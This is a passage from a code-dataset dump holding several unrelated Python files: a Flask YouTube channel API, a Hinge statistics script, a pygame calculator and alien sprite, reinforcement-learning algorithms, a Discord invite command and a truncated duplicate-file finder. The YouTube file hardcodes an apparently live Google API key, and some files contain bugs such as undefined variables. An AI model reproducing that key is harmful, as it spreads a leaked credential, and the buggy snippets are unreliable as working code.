'total_100video_comments','total_100video_shares','facebook_url', 'insta_url', 'twitter_url','country','total_videos']\n response_list = []\n for item in youtube_inf:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n return {'data' : response_list}\n\n\n@ns_youtube.route('/totalVideos/')\nclass TotalVideos(Resource):\n def get(self,channel_id):\n '''get total videos by channel_id'''\n connecsiObj = ConnecsiModel()\n data = connecsiObj.getTotalVideos(channel_id=channel_id)\n response_list = []\n columns=['total_videos']\n for item in data:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n return {'data': response_list}\n\n\n@ns_youtube.route('/addYoutubeChannel//')\nclass Youtube(Resource):\n def post(self,channel_id,business_email):\n '''add youtube channel details by channel_id'''\n try:\n data = [channel_id]\n connecsiObj = ConnecsiModel()\n res = connecsiObj.insert__(data=data, table_name='youtube_channel_ids', columns=['channel_id'],\n IGNORE='IGNORE')\n print('res = ',res)\n try:\n connecsiObj.insert_youtube_id_into_channels_mapper(youtube_channel_id=channel_id,confirmed='true')\n except Exception as e:\n print(e)\n return {'message' : e}\n try:\n conObj = YoutubeApiController()\n conObj.get_data_by_channel_id(channel_id=channel_id,business_email=business_email)\n return {'message': 'inserted youtube channel id and details'}\n except Exception as e :\n print('exception = ',e)\n return {'message': e}\n except Exception as e :\n return {'message' : e}\n\n\n\n@ns_youtube.route('/getYoutubeChannelSnippetFromYoutubeSearchApi/')\nclass Youtube(Resource):\n def get(self,search_query):\n ''' Get youtube channel snippet from youtube Search api\n returns a list of channel ids , title and channel img\n '''\n try:\n print(search_query)\n response_list = []\n channel_ids=[]\n api_key = 'AIzaSyDAwoNaRbQYSl7J_Ll2fztqwT1Gg1ZEMzU'\n search_url = 'https://www.googleapis.com/youtube/v3/search?part=snippet&maxResults=50&order=viewCount&q='+search_query+'&type=channel&key='+api_key\n print(search_url)\n channel_data = requests.get(url=search_url)\n channel_data_json = channel_data.json()\n for item in channel_data_json['items']:\n print(item)\n response_dict = {}\n channel_id = item['snippet']['channelId']\n print(channel_id)\n channel_ids.append(channel_id)\n channel_thumbnail = item['snippet']['thumbnails']['medium']['url']\n channelTitle = item['snippet']['title']\n response_dict.update({'channel_id':channel_id})\n response_dict.update({'title': channelTitle})\n response_dict.update({'channel_img': channel_thumbnail})\n response_list.append(response_dict)\n connecsiObj = ConnecsiModel()\n connecsiObj.insert__(table_name='youtube_channel_ids',data=channel_ids,columns=['channel_id'],IGNORE='IGNORE')\n return response_list\n except Exception as e:\n print('exception = ',e)\n return {'message': e}\n\n@ns_youtube.route('/getYoutubeChannelDetailsFromYoutubeApi/')\nclass Youtube(Resource):\n def get(self,channel_id):\n ''' Get youtube channel details by channel_id from youtube api'''\n try:\n data = [channel_id]\n connecsiObj = ConnecsiModel()\n res = connecsiObj.insert__(data=data, table_name='youtube_channel_ids', columns=['channel_id'],\n IGNORE='IGNORE')\n print('res = ',res)\n try:\n connecsiObj.insert_youtube_id_into_channels_mapper(youtube_channel_id=channel_id,confirmed='true')\n except Exception as e:\n print(e)\n return {'message' : e}\n try:\n conObj = YoutubeApiController()\n conObj.get_data_by_channel_id(channel_id=channel_id,business_email='')\n connecsiObj = ConnecsiModel()\n columns = ['channel_id', 'title', 'channel_img', 'desc', 'subscriberCount_gained', 'subscriberCount_lost',\n 'business_email', 'total_100video_views',\n 'total_100video_views_unique', 'total_100video_likes', 'total_100video_dislikes',\n 'total_100video_comments', 'total_100video_shares',\n 'facebook_url', 'insta_url', 'twitter_url', 'country']\n channel_details = connecsiObj.get__(table_name='youtube_channel_details', columns=columns, WHERE='WHERE',\n compare_column='channel_id', compare_value=channel_id)\n print(channel_details)\n\n response_list = []\n for item in channel_details:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n print(response_list)\n return {'data': response_list}\n except Exception as e :\n print('exception = ',e)\n return {'message': e}\n except Exception as e :\n return {'message' : e}\n\n\n\n@ns_youtube.route('/getChannelDetailsByChannelId/')\nclass Youtube(Resource):\n def get(self,channel_id):\n ''' get channel detail by channel id'''\n connecsiObj = ConnecsiModel()\n columns = ['channel_id', 'title', 'channel_img', 'desc', 'subscriberCount_gained', 'subscriberCount_lost',\n 'business_email', 'total_100video_views',\n 'total_100video_views_unique', 'total_100video_likes', 'total_100video_dislikes',\n 'total_100video_comments', 'total_100video_shares',\n 'facebook_url', 'insta_url', 'twitter_url', 'country']\n channel_details = connecsiObj.get__(table_name='youtube_channel_details',columns=columns,WHERE='WHERE',compare_column='channel_id',compare_value=channel_id)\n print(channel_details)\n\n response_list = []\n for item in channel_details:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n\n print(response_list)\n return {'data': response_list}\n\n\n@ns_youtube.route('/getAllVideoDetailsByChannelId/')\nclass Youtube(Resource):\n def get(self,channel_id):\n ''' get video detail by channel id'''\n connecsiObj = ConnecsiModel()\n columns = ['video_id','channel_id','publishedAt','title','thumbnail','tags','category_id',\n 'description','viewCount','likeCount','dislikeCount','favoriteCount','commentCount','shareCount']\n video_details = connecsiObj.get__(table_name='youtube_video_details',columns=columns,WHERE='WHERE',compare_column='channel_id',compare_value=channel_id)\n print(type(video_details))\n video_details_list = list(video_details)\n print(type(video_details_list))\n response_list = []\n for item in video_details_list:\n item_list = list(item)\n item_list[2] = datetime.datetime.timestamp(item_list[2])\n dict_temp = dict(zip(columns, item_list))\n response_list.append(dict_temp)\n # print(response_list)\n return {'data': response_list}\n\n\n@ns_youtube.route('/getVideoCategoriesByChannelId/')\nclass VideoCategories(Resource):\n def get(self,channel_id):\n ''' get video categories by video cat id '''\n connecsiObj = ConnecsiModel()\n video_categories = connecsiObj.get_youtube_video_categories_id_and_name_by_channel_id(channel_id=channel_id)\n print(video_categories)\n columns = ['channel_id','video_cat_id','video_cat_name','category_count']\n response_list = []\n for item in video_categories:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n\n print(response_list)\n return {'data': response_list}","repo_name":"kiran-padwal/backend_connecsi","sub_path":"apis/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":17539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36041328444","text":"import json\nimport sys\nimport re\n\ninput_file = sys.argv[1]\n\nprint(\"Parsing data...\")\n\nrejected = 0\nlikes = 0\nmatches = 0\nchats = 0\nu_ghosted = 0\nunrequited_love = 0\nthey_dunk = 0\nthey_ghosted = 0\nu_dunk = 0\ntotal_interactions = 0\nnumbers_sent = 0\n\n# Thanks to StackOverflow for this regex for phone numbers\n# https://stackoverflow.com/a/16702965/1031615\nphone_regex = '^.*\\s*(?:\\+?(\\d{1,3}))?[-. (]*(\\d{3})[-. )]*(\\d{3})[-. ]*(\\d{4})(?: *x(\\d+))?\\s*'\n\nwith open(input_file, 'r') as f:\n data = json.load(f)\n for blob in data:\n interactions = list(blob.keys())\n first_interaction = interactions[0]\n if len(interactions) > 1:\n second_interaction = interactions[1]\n else:\n second_interaction = 'noop'\n total_interactions += 1\n if first_interaction == 'block':\n rejected += 1\n elif first_interaction == 'like':\n likes += 1\n if second_interaction == 'match':\n matches += 1\n u_ghosted += 1\n u_dunk +=1\n elif first_interaction == 'match':\n matches += 1\n they_dunk += 1\n they_ghosted += 1\n elif first_interaction == 'chats':\n chats += 1\n if second_interaction == 'like':\n likes += 1\n matches += 1\n u_dunk +=1\n elif second_interaction == 'match':\n matches += 1\n they_dunk += 1\n for c in blob['chats']:\n if bool(re.search(phone_regex, c['body'])):\n numbers_sent += 1\n break\n\ntot_string = \"You've interacted with \" + str(total_interactions) + \" people on Hinge \\n\"\nrej_string = \"You've rejected \" + str(rejected) + \" people (ouch) \\nYou match with \" + str(round(matches/total_interactions * 100, 2)) + \"% of profiles you see on Hinge.\\n\"\ntot_ghost_string = \"You've ghosted at least \" + str(u_ghosted + they_ghosted) + \", or at least \" + str(round((u_ghosted+they_ghosted)/matches * 100, 2)) + \"% of all the people you match with\\n\"\nu_ghost_string = \"Total you've dropped the ball: \" + str(u_ghosted) + \" (you sent a like and they matched, no chatting) \\n\"\nthey_ghost_string = \"Total they've dropped the ball \" + str(they_ghosted) + \" (they sent a like and you matched, no chatting) \\n\"\nthey_dunk_string = \"Total shots they've shot and scored: \" + str(they_dunk) + \" (they sent a like and you matched) \\n\"\nu_dunk_string = \"Total shots you've shot and scored: \" + str(u_dunk) + \" (you sent a like and they matched) \\n\"\ntot_likes = \"Total shots you've shot: \" + str(likes) + \" (you sent a like)\\n\"\ntot_matches = \"Total slam dunks: \" + str(matches) + \" (you've matched with someone or they've matched with you) \\n\"\ntot_chats = \"Total people you've blessed with your time: \" + str(chats) + \" (you sent a message at least once) \\n\"\ntot_numbers = \"You've sent a phone number to \" + str(numbers_sent) + \" people on Hinge, or \" + str(round((numbers_sent/matches) * 100, 2)) + \"% of all the people you match with.\\n\"\n\nanalysis = tot_string + tot_likes + tot_matches + tot_chats\nanalysis += \"\\n------------- \\n\\n\\n\"\nanalysis += \"Fun Stuff ~ \\n\\n\"\nanalysis += rej_string + tot_ghost_string + u_ghost_string + they_ghost_string + they_dunk_string + u_dunk_string + tot_numbers\n\n\nprint(\"Analysis complete!\")\nprint(analysis)\n","repo_name":"emam97/tiktok","sub_path":"lib/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"33253549481","text":"import pygame\nimport pygame_textinput\n\nfrom utils.load_assets import (\n BG_CALC_L,\n BG_CALC_D,\n BIG_FONT,\n MAIN_FONT,\n BACK,\n MENU,\n FONT_COLOR_L,\n FONT_COLOR_D,\n)\nfrom settings import WIN, WIDTH, WIDTH_H, HEIGHT_H, FPS\nfrom utils.user_settings_handling import return_user_settings\nfrom apps.settings_menu import settings_menu\n\n\ndef kalkulacka_app():\n \"\"\"\n GUI pre Kalkulacku\n \"\"\"\n run = True\n click = False\n clock = pygame.time.Clock()\n active = None\n\n # BUTTON INITIALIZATION\n B_RETURNED_PRICE = pygame.Rect(140, 480, 220, 95)\n B_BACK = pygame.Rect(20, 20, 60, 60)\n B_MENU = pygame.Rect(WIDTH - 65 - 20, 20, 60, 60)\n\n while run:\n pos_x, pos_y = pygame.mouse.get_pos()\n user_settings = return_user_settings()\n BG = BG_CALC_L if user_settings[\"theme\"] == \"light\" else BG_CALC_D\n FONT_COLOR = FONT_COLOR_L if user_settings[\"theme\"] == \"light\" else FONT_COLOR_D\n WIN.blit(BG, (0, 0))\n WIN.blit(BACK, (20, 20))\n WIN.blit(MENU, (WIDTH - 65 - 20, 20))\n\n # LABELS\n label_ac = BIG_FONT.render(\"AC\", 1, FONT_COLOR)\n WIN.blit(label_ac, (65, 365))\n label_7 = BIG_FONT.render(\"7\", 1, FONT_COLOR)\n WIN.blit(label_7, (80, 465))\n label_4 = BIG_FONT.render(\"4\", 1, FONT_COLOR)\n WIN.blit(label_4, (80, 565))\n label_4 = BIG_FONT.render(\"1\", 1, FONT_COLOR)\n WIN.blit(label_4, (88, 665))\n label_0 = BIG_FONT.render(\"0\", 1, FONT_COLOR)\n WIN.blit(label_0, (130, 765))\n label_8 = BIG_FONT.render(\"8\", 1, FONT_COLOR)\n WIN.blit(label_8, (185, 465))\n label_5 = BIG_FONT.render(\"5\", 1, FONT_COLOR)\n WIN.blit(label_5, (185, 565))\n label_2 = BIG_FONT.render(\"2\", 1, FONT_COLOR)\n WIN.blit(label_2, (185, 665))\n label_9 = BIG_FONT.render(\"9\", 1, FONT_COLOR)\n WIN.blit(label_9, (280, 465))\n label_6 = BIG_FONT.render(\"6\", 1, FONT_COLOR)\n WIN.blit(label_6, (280, 565))\n label_3 = BIG_FONT.render(\"3\", 1, FONT_COLOR)\n WIN.blit(label_3, (280, 665))\n label_equals = BIG_FONT.render(\"=\", 1, FONT_COLOR)\n WIN.blit(label_equals, (395, 765))\n label_dot = BIG_FONT.render(\".\", 1, FONT_COLOR)\n WIN.blit(label_dot, (290, 765))\n label_divide = BIG_FONT.render(\"/\", 1, FONT_COLOR)\n WIN.blit(label_divide, (400, 365))\n label_times = BIG_FONT.render(\"*\", 1, FONT_COLOR)\n WIN.blit(label_times, (400, 475))\n label_minus = BIG_FONT.render(\"-\", 1, FONT_COLOR)\n WIN.blit(label_minus, (400, 570))\n label_plus = BIG_FONT.render(\"+\", 1, FONT_COLOR)\n WIN.blit(label_plus, (398, 668))\n\n # Zistovanie, ci nebolo kliknute na textove pole\n if click:\n if B_STOCK_INPUT.collidepoint(pos_x, pos_y):\n active = stock_input\n elif B_GET_PRICE.collidepoint(pos_x, pos_y):\n result = price_validation(stock_input.get_text().strip())\n elif B_BACK.collidepoint(pos_x, pos_y):\n run = False\n elif B_MENU.collidepoint(pos_x, pos_y):\n settings_menu()\n events = pygame.event.get()\n stock_input.update(events)\n else:\n active = None\n\n # Setnutie aktivneho textoveho pola, pokial nejake je\n try:\n active.update(events)\n except AttributeError:\n pass\n\n # keys = pygame.key.get_pressed()\n # if keys[pygame.K_RETURN]:\n # result = price_validation(stock_input.get_text().strip())\n\n # Event handling\n events = pygame.event.get()\n for event in events:\n if event.type == pygame.QUIT:\n run = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n click = True\n if event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1:\n click = False\n\n pygame.display.update()\n clock.tick(FPS)\n","repo_name":"MichalRybecky/JAKP","sub_path":"apps/kalkulacka.py","file_name":"kalkulacka.py","file_ext":"py","file_size_in_byte":4056,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"39310197616","text":"import math\nimport numpy as np\n\n\nclass default_analysis(object):\n\t\"\"\"A placeholder class for analysis conducted during training.\n\n\tTo be overwritten by specialized code for the problem being\n\tstudied.\n\t\"\"\"\n\t\n\tdef per_step(self, past_state, action, current_state, action_probability):\n\t\t\"\"\"Placeholder for the calculations conducted at each episode step.\"\"\"\n\t\tpass\n\n\tdef reset(self):\n\t\t\"\"\"Placeholder for resetting state after each episode.\"\"\"\n\t\tpass\n\n\tdef per_episode(self, state):\n\t\t\"\"\"Placeholder for calculations conducted after each episode.\"\"\"\n\t\tpass\n\n\tdef evaluation_reset(self):\n\t\t\"\"\"Alternative reset for post-training evaluation.\"\"\"\n\t\tpass\n\n\tdef per_sample(self, state, sample):\n\t\t\"\"\"Alternative for per episode calculations during evaluation.\"\"\"\n\t\tpass\n\nclass episodic_algorithm(object):\n\t\"\"\"A wrapper for episodic RL algorithms.\n\t\n\tLays out the general structure of finite-time RL algorithms, with\n\tplaceholder functions to be overwritten as required by inheriting \n\tclasses.\n\t\"\"\"\n\n\tdef __init__(self, parameters):\n\t\tself.environment = parameters['environment']\n\t\tself.average_return = 0\n\t\tself.average_returns = []\n\t\tself.returns = []\n\t\tself.return_learning_rate = parameters['return_learning_rate']\n\t\tself.policy = parameters['policy']\n\t\tself.episode = 0\n\t\tself.current_state = self.environment.reset()\n\t\tself.past_state = self.current_state.copy()\n\t\tself.action = 0\n\t\tself.action_probability = 0.5\n\t\tself.reward = 0\n\t\tself.current_return = 0\n\t\tself.end = False\n\t\tself.info = None\n\t\tif 'analyser' in parameters:\n\t\t\tself.analyser = parameters['analyser']\n\t\telse:\n\t\t\tself.analyser = default_analysis()\n\t\n\tdef _reward(self):\n\t\t\"\"\"Placeholder function which can be overwritten to modify the reward.\"\"\"\n\t\treturn self.reward\n\n\tdef _transition(self):\n\t\t\"\"\"Requests an action from the policy and sends it to the environment.\"\"\"\n\t\tself.past_state = self.current_state.copy()\n\t\tself.action, self.eligibility, self.action_probability = self.policy.action(\n\t\t\tself.current_state)\n\t\tself.current_state, self.reward, self.end, self.info = self.environment.step(\n\t\t\tself.action)\n\t\tself.current_return += self._reward()\n\t\tself.analyser.per_step(self.past_state, self.action, \n\t\t\t\t\t\t\t\tself.current_state, self.action_probability)\n\n\tdef _per_step(self):\n\t\t\"\"\"A placeholder for a learning algorithms computations per transition.\"\"\"\n\t\tself._transition()\n\n\tdef _per_episode(self):\n\t\t\"\"\"A placeholder for a learning algorithms computations after episodes.\"\"\"\n\t\tself.analyser.per_episode(self.current_state)\n\t\tself.current_state = self.environment.reset()\n\t\tself.past_state = self.current_state.copy()\n\t\tself.end = False\n\n\tdef _episode(self):\n\t\t\"\"\"Uses _per_step and _per_episode to run a generic episodes computations.\"\"\"\n\t\tself.current_return = 0\n\t\twhile not self.end:\n\t\t\tself._per_step()\n\t\tself._per_episode()\n\t\tself.average_return += self.return_learning_rate * (self.current_return \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t- self.average_return)\n\t\tself.episode += 1\n\n\tdef train(self, episodes):\n\t\t\"\"\"Trains the policy by repeatedly running episodes, storing return info.\"\"\"\n\t\tself.episode = 0\n\t\twhile self.episode < episodes:\n\t\t\tself._episode()\n\t\t\tself.average_returns.append(self.average_return)\n\t\t\tself.returns.append(self.current_return)\n\n\tdef _sample(self):\n\t\t\"\"\"Generates a sample trajectory using the current policy.\"\"\"\n\t\tself.current_return = 0\n\t\ttrajectory = [self.current_state.copy()]\n\t\twhile not self.end:\n\t\t\tself._transition()\n\t\t\ttrajectory.append(self.current_state.copy())\n\t\tself.current_state = self.environment.reset()\n\t\tself.past_state = self.current_state.copy()\n\t\tself.end = False\n\t\tself.analyser.reset()\n\t\treturn trajectory\n\n\tdef samples(self, sample_count):\n\t\t\"\"\"Generates a set of trajectory samples.\"\"\"\n\t\ttrajectories = []\n\t\tsample = 0\n\t\twhile sample < sample_count:\n\t\t\ttrajectory = self._sample()\n\t\t\ttrajectories.append(trajectory)\n\t\t\tsample += 1\n\t\treturn trajectories\n\n\tdef _return_sample(self):\n\t\t\"\"\"Runs an episode to sample a return for evaulation.\"\"\"\n\t\tself.current_return = 0\n\t\twhile not self.end:\n\t\t\tself._transition()\n\t\tself.analyser.per_sample(self.current_state, self.sample)\n\t\tself.current_state = self.environment.reset()\n\t\tself.past_state = self.current_state.copy()\n\t\tself.end = False\n\n\tdef evaluate(self, sample_count):\n\t\t\"\"\"Evaluates the policy by estimating the average return.\"\"\"\n\t\tself.sample = 1\n\t\tself.average_return = 0\n\t\tself.analyser.evaluation_reset()\n\t\twhile self.sample <= sample_count:\n\t\t\tself._return_sample()\n\t\t\tself.average_return += (self.current_return - self.average_return)/self.sample\n\t\t\tself.sample += 1\n\n\nclass monte_carlo_returns(episodic_algorithm):\n\t\"\"\"A purely return based policy gradient algorithm.\"\"\"\n\n\tdef __init__(self, parameters):\n\t\tsuper().__init__(parameters)\n\t\tself.states = []\n\t\tself.rewards = []\n\t\tself.eligibilities = []\n\n\tdef _per_step(self):\n\t\t\"\"\"Adds required data storage for learning post-episode.\"\"\"\n\t\tself._transition()\n\t\tself.states.append(self.past_state)\n\t\tself.rewards.append(self._reward())\n\t\tself.eligibilities.append(self.eligibility)\n\n\tdef _update(self):\n\t\t\"\"\"Loops over the episode in reverse, updating the policy in each state.\"\"\"\n\t\tself.rewards = np.array(self.rewards)\n\t\tstate_return = 0\n\t\tfor index in range(len(self.states) - 1, -1, -1):\n\t\t\tstate_return += self.rewards[index]\n\t\t\tself.policy.step(self.states[index], state_return, self.eligibilities[index])\n\n\tdef _per_episode(self):\n\t\t\"\"\"Adds additional resets relevant to learning algorithm.\"\"\"\n\t\tself._update()\n\t\tsuper()._per_episode()\n\t\tself.states = []\n\t\tself.rewards = []\n\t\tself.eligibilities = []\n\n\nclass max_entropy_monte_carlo_returns(monte_carlo_returns):\n\t\"\"\"Adds entropy to a purely return based policy gradient algorithm.\"\"\"\n\n\tdef __init__(self, parameters, entropy_scaling = 1):\n\t\tsuper().__init__(parameters)\n\t\tself.entropy_scaling = entropy_scaling\n\n\tdef _reward(self):\n\t\t\"\"\"Adds entropy regularization to the reward.\"\"\"\n\t\treturn self.reward - self.entropy_scaling * math.log(self.action_probability)\n\n\nclass kl_regularized_monte_carlo_returns(monte_carlo_returns):\n\t\"\"\"Adds entropy to a purely return based policy gradient algorithm.\"\"\"\n\n\tdef _reward(self):\n\t\t\"\"\"Adds Kullback-Leibler regularization to the reward.\"\"\"\n\t\tkl_reg = self.environment.kl_regularization(\n\t\t\tself.past_state, self.action, self.action_probability)\n\t\treturn self.reward + kl_reg\n\n\nclass monte_carlo_value_baseline(monte_carlo_returns):\n\t\"\"\"Contrasts returns with estimated values for policy updates.\"\"\"\n\n\tdef __init__(self, parameters):\n\t\tsuper().__init__(parameters)\n\t\tself.values = parameters['values']\n\t\tself.state_values = []\n\n\tdef _per_step(self):\n\t\t\"\"\"Adds required data storage for learning post-episode.\"\"\"\n\t\tsuper()._per_step()\n\t\tself.state_values.append(self.values.forward(self.past_state))\n\n\tdef _update(self):\n\t\t\"\"\"Loops over the episode in reverse, updating state policies and values.\"\"\"\n\t\tself.rewards = np.array(self.rewards)\n\t\tstate_return = 0\n\t\tfor index in range(len(self.states) - 1, -1, -1):\n\t\t\tstate_return += self.rewards[index]\n\t\t\terror = state_return - self.state_values[index]\n\t\t\tself.policy.step(self.states[index], error, self.eligibilities[index])\n\t\t\tself.values.step(self.states[index], error)\n\n\tdef _per_episode(self):\n\t\t\"\"\"Adds additional resets relevant to learning algorithm.\"\"\"\n\t\tsuper()._per_episode()\n\t\tself.state_values = []\n\n\nclass max_entropy_monte_carlo_value_baseline(monte_carlo_value_baseline):\n\t\"\"\"Adds entropy to a purely return based policy gradient algorithm.\"\"\"\n\n\tdef __init__(self, parameters, entropy_scaling = 1):\n\t\tsuper().__init__(parameters)\n\t\tself.entropy_scaling = entropy_scaling\n\n\tdef _reward(self):\n\t\t\"\"\"Adds entropy regularization to the reward.\"\"\"\n\t\treturn self.reward - self.entropy_scaling * math.log(self.action_probability)\n\n\nclass kl_regularized_monte_carlo_value_baseline(monte_carlo_value_baseline):\n\t\"\"\"Adds entropy to a purely return based policy gradient algorithm.\"\"\"\n\n\tdef _reward(self):\n\t\t\"\"\"Adds Kullback-Leibler regularization to the reward.\"\"\"\n\t\tkl_reg = self.environment.kl_regularization(\n\t\t\tself.past_state, self.action, self.action_probability)\n\t\treturn self.reward + kl_reg\n\n\nclass actor_critic(episodic_algorithm):\n\t\"\"\"Uses the value as a baseline and an estimate of future returns.\"\"\"\n\n\tdef __init__(self, parameters):\n\t\tsuper().__init__(parameters)\n\t\tself.values = parameters['values']\n\n\tdef _update(self):\n\t\t\"\"\"Updates the policy and value for the previous state.\"\"\"\n\t\tpast_value = self.values.forward(self.past_state)\n\t\tif not self.end:\n\t\t\tcurrent_value = self.values.forward(self.current_state)\n\t\telse:\n\t\t\tcurrent_value = 0\n\t\ttd_error = current_value + self._reward() - past_value\n\t\tself.values.step(self.past_state, td_error)\n\t\tself.policy.step(self.past_state, td_error, self.eligibility)\n\n\tdef _per_step(self):\n\t\t\"\"\"Overrides the _per_step method, to transition and update each step.\"\"\"\n\t\tself._transition()\n\t\tself._update()\n\n\nclass max_entropy_actor_critic(actor_critic):\n\t\"\"\"Uses the value as a baseline and an estimate of future returns.\"\"\"\n\n\tdef __init__(self, parameters, entropy_scaling = 1):\n\t\tsuper().__init__(parameters)\n\t\tself.entropy_scaling = entropy_scaling\n\n\tdef _reward(self):\n\t\t\"\"\"Adds entropy regularization to the reward.\"\"\"\n\t\treturn self.reward - self.entropy_scaling * math.log(self.action_probability)\n\n\nclass kl_regularized_actor_critic(actor_critic):\n\t\"\"\"Uses the value as a baseline and an estimate of future returns.\"\"\"\n\n\tdef _reward(self):\n\t\t\"\"\"Adds Kullback-Leibler regularization to the reward.\"\"\"\n\t\tkl_reg = self.environment.kl_regularization(\n\t\t\tself.past_state, self.action, self.action_probability)\n\t\treturn self.reward + kl_reg","repo_name":"JamieMair/rledts","sub_path":"tabular_excursions/source/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":9563,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"42346898174","text":"from somsiad import SomsiadMixin\nimport discord\nfrom discord.ext import commands\n\nfrom core import cooldown\n\n\nclass Invite(commands.Cog, SomsiadMixin):\n @cooldown()\n @commands.command(aliases=['zaproś', 'zapros'])\n @commands.guild_only()\n async def invite(self, ctx, *, argument=''):\n is_user_permitted_to_invite = False\n for channel in ctx.guild.channels:\n if channel.permissions_for(ctx.author).create_instant_invite:\n is_user_permitted_to_invite = True\n break\n if 'somsiad' in argument or ctx.me in ctx.message.mentions:\n embed = self.bot.generate_embed(\n '🏠',\n 'Zapraszam do Somsiad Labs – mojego domu',\n 'http://discord.gg/xRCpDs7',\n url='http://discord.gg/xRCpDs7',\n )\n elif is_user_permitted_to_invite:\n max_uses = 0\n unique = False\n for word in argument.split():\n if 'now' in word.lower() or 'twórz' in word.lower() or 'tworz' in word.lower():\n unique = True\n if 'jednoraz' in word.lower():\n max_uses = 1\n else:\n try:\n max_uses = abs(int(word))\n except ValueError:\n pass\n channel = None\n if ctx.channel.permissions_for(ctx.me).create_instant_invite:\n channel = ctx.channel\n else:\n for current_channel in ctx.guild.channels:\n if (\n current_channel.permissions_for(ctx.me).create_instant_invite\n and current_channel.permissions_for(ctx.author).create_instant_invite\n and not isinstance(current_channel, discord.CategoryChannel)\n ):\n channel = current_channel\n break\n if channel is None:\n embed = self.bot.generate_embed(\n '⚠️',\n 'Nie utworzono zaproszenia, bo bot nie ma do tego uprawnień na żadnym kanale, '\n 'na którym ty je masz',\n )\n else:\n invite = await channel.create_invite(max_uses=max_uses, unique=unique, reason=str(ctx.author))\n if max_uses == 0:\n max_uses_info = ' o nieskończonej liczbie użyć'\n elif max_uses == 1:\n max_uses_info = ' jednorazowe'\n else:\n max_uses_info = f' o {max_uses} użyciach'\n embed = self.bot.generate_embed(\n '✅',\n f'Utworzono{max_uses_info if max_uses == 1 else \"\"} zaproszenie na kanał '\n f'{\"#\" if isinstance(channel, discord.TextChannel) else \"\"}{channel}'\n f'{max_uses_info if max_uses != 1 else \"\"}',\n invite.url,\n url=invite.url,\n )\n else:\n embed = self.bot.generate_embed(\n '⚠️' 'Nie utworzono zaproszenia, bo nie masz do tego uprawnień na żadnym kanale'\n )\n await self.bot.send(ctx, embed=embed)\n\n\nasync def setup(bot: commands.Bot):\n await bot.add_cog(Invite(bot))\n","repo_name":"Twixes/somsiad","sub_path":"plugins/invite.py","file_name":"invite.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"37083924024","text":"import pygame\nimport os\nfrom pygame.sprite import Sprite\n\n\nclass Alien(Sprite):\n def __init__(self, ai_settings, screen, color):\n super(Alien, self).__init__()\n self.screen = screen\n self.ai_settings = ai_settings\n self.my_points = 0\n self.images = self.init_alien(color)\n\n self.index = 0\n self.image = self.images[self.index]\n\n self.rect = self.image.get_rect()\n self.rect.x = self.rect.width\n self.rect.y = self.rect.height\n\n self.height = self.rect\n self.x = float(self.rect.x)\n\n self.prep_explosion()\n\n def init_alien(self, color):\n images = []\n path = 'images/Greenie/'\n if color == \"green\":\n path = 'images/Greenie/'\n self.my_points = 10\n elif color == \"yellow\":\n path = 'images/Yellow Mellow/'\n self.my_points = 10\n elif color == \"purple\":\n path = 'images/Purple/'\n self.my_points = 10\n elif color == \"blue\":\n path = 'images/Blue/'\n self.my_points = 10\n elif color == \"green_boss\":\n path = 'images/Green/'\n self.my_points = 40\n elif color == \"aqua\":\n path = 'images/Aqua/'\n self.my_points = 20\n\n for file_name in os.listdir(path):\n alien = pygame.image.load(path + os.sep + file_name)\n images.append(alien)\n return images\n\n def blitme(self):\n self.screen.blit(self.image, self.rect)\n\n def check_edges(self):\n screen_rect = self.screen.get_rect()\n if self.rect.right >= screen_rect.right:\n return True\n elif self.rect.left <= 0:\n return True\n\n def prep_explosion(self):\n self.explosion = []\n self.prev_y = self.rect.bottom\n self.prev_x = self.rect.centerx\n self.exp_index = 0\n\n path = 'images/alien explosion/'\n for file_name in os.listdir(path):\n alien = pygame.image.load(path + os.sep + file_name)\n self.explosion.append(alien)\n\n def alien_explosion(self):\n self.image = self.explosion[self.exp_index]\n self.rect = self.image.get_rect()\n self.rect.centerx = self.prev_x\n self.rect.bottom = self.prev_y\n\n def update_explosion(self):\n if self.exp_index < len(self.images):\n self.alien_explosion()\n self.exp_index += 1\n elif self.exp_index >= len(self.images):\n self.ai_settings.alien_explosion = False\n\n def update(self):\n self.index += 1\n\n if self.index >= len(self.images):\n self.index = 0\n self.image = self.images[self.index]\n self.x += (self.ai_settings.alien_speed_factor * self.ai_settings.fleet_direction)\n self.rect.x = self.x\n","repo_name":"Diana-Joya/Aliens","sub_path":"alien.py","file_name":"alien.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70091208427","text":"# EGE CAN KAYA\r\n# 2018400018\r\n\r\nimport argparse\r\nimport os\r\nimport hashlib\r\nfrom collections import defaultdict\r\n\r\n# define a class that will hold the name, path and size of a file\r\nclass File:\r\n def __init__(self, name, path, size):\r\n self.name = name\r\n self.path = path\r\n self.size = size\r\n\r\n\r\n# define a class that will hold the name and path of a file and also calculate its size\r\n# (sum of the sizes of its files and subdirectories)\r\nclass Directory:\r\n size = 0\r\n\r\n # recursively calculates the size of a directory, making use of os.walk\r\n def directory_size(self, fullpath):\r\n totalsize = 0 \r\n for root, dirs, files in os.walk(fullpath):\r\n for f in files:\r\n f_fullpath = os.path.join(root, f)\r\n totalsize += os.stat(f_fullpath).st_size\r\n for d in dirs:\r\n d_fullpath = os.path.join(root, d)\r\n totalsize += self.directory_size(d_fullpath)\r\n return totalsize\r\n\r\n def 